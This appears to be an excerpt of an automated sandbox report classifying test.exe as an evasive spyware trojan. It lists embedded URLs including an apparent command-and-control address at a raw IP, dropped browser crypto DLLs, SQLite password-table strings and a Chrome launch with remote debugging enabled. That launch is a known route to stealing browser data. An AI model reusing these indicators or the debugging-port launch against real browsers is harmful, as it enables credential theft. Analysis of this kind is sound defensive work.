              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://45.93.20.2885a1cacf11314eb8.phpme
              Source: test.exe, 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28f
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: test.exe, test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1470831896.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: EHJJKFCBGIDGHIECGCBK.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
              Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://support.mozilla.org
              Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBK.0.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: test.exe, 00000000.00000003.1347180471.0000000001834000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBK.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://www.mozilla.org
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: test.exe, 00000000.00000003.1426878099.000000000C153000.00000004.00000020.00020000.00000000.sdmp, IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/4
              Source: test.exe, 00000000.00000003.1426878099.000000000C153000.00000004.00000020.00020000.00000000.sdmp, IDGHDGIDAKEBAAKFCGHCBAKJDA.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: test.exeStatic PE information: section name:
              Source: test.exeStatic PE information: section name: .idata
              Source: test.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CD1B700
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1B8C0 rand_s,NtQueryVirtualMemory,0_2_6CD1B8C0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6CD1B910
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CCBF280
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCB35A00_2_6CCB35A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC64C00_2_6CCC64C0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCDD4D00_2_6CCDD4D0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBD4E00_2_6CCBD4E0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF6CF00_2_6CCF6CF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC6C800_2_6CCC6C80
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD134A00_2_6CD134A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1C4A00_2_6CD1C4A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC54400_2_6CCC5440
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD2545C0_2_6CD2545C
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD02C100_2_6CD02C10
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD2AC000_2_6CD2AC00
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF5C100_2_6CCF5C10
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD2542B0_2_6CD2542B
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF0DD00_2_6CCF0DD0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD185F00_2_6CD185F0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCCFD000_2_6CCCFD00
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCE05120_2_6CCE0512
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCDED100_2_6CCDED10
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD276E30_2_6CD276E3
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBBEF00_2_6CCBBEF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCCFEF00_2_6CCCFEF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1E6800_2_6CD1E680
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCD5E900_2_6CCD5E90
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD14EA00_2_6CD14EA0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCD46400_2_6CCD4640
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCD9E500_2_6CCD9E50
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD02E4E0_2_6CD02E4E
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF3E500_2_6CCF3E50
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD26E630_2_6CD26E63
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBC6700_2_6CCBC670
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD056000_2_6CD05600
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF7E100_2_6CCF7E10
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD19E300_2_6CD19E30
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBDFE00_2_6CCBDFE0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCE6FF00_2_6CCE6FF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD077A00_2_6CD077A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC9F000_2_6CCC9F00
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF77100_2_6CCF7710
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD250C70_2_6CD250C7
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCDC0E00_2_6CCDC0E0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF58E00_2_6CCF58E0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCE60A00_2_6CCE60A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCD88500_2_6CCD8850
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCDD8500_2_6CCDD850
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCFF0700_2_6CCFF070
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC78100_2_6CCC7810
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCFB8200_2_6CCFB820
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD048200_2_6CD04820
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD129900_2_6CD12990
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF51900_2_6CCF5190
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBC9A00_2_6CCBC9A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCED9B00_2_6CCED9B0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCDA9400_2_6CCDA940
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD0B9700_2_6CD0B970
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD2B1700_2_6CD2B170
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCCD9600_2_6CCCD960
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF8AC00_2_6CCF8AC0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCD1AF00_2_6CCD1AF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCFE2F00_2_6CCFE2F0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD2BA900_2_6CD2BA90
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD22AB00_2_6CD22AB0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCB22A00_2_6CCB22A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCE4AA00_2_6CCE4AA0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCCCAB00_2_6CCCCAB0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF9A600_2_6CCF9A60
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD253C80_2_6CD253C8
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBF3800_2_6CCBF380
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCB53400_2_6CCB5340
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCCC3700_2_6CCCC370
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCFD3200_2_6CCFD320
              Source: C:\Users\user\Desktop\test.exeCode function: String function: 6CCECBE8 appears 134 times
              Source: C:\Users\user\Desktop\test.exeCode function: String function: 6CCF94D0 appears 90 times
              Source: test.exe, 00000000.00000002.1471290644.000000006CF35000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs test.exe
              Source: test.exe, 00000000.00000002.1471017384.000000006CD42000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs test.exe
              Source: test.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: test.exeStatic PE information: Section: rygczwdk ZLIB complexity 0.9948654407834453
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/28@2/4
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6CD17030
              Source: C:\Users\user\Desktop\test.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\8WZQH9L4.htmJump to behavior
              Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: test.exe, 00000000.00000003.1342784645.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, IJKFCFHJDBKKFHIEHIDG.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: test.exeReversingLabs: Detection: 60%
              Source: test.exeVirustotal: Detection: 64%
              Source: test.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: unknownProcess created: C:\Users\user\Desktop\test.exe "C:\Users\user\Desktop\test.exe"
              Source: C:\Users\user\Desktop\test.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,7698725374925482900,7061072673800453571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2320 /prefetch:3
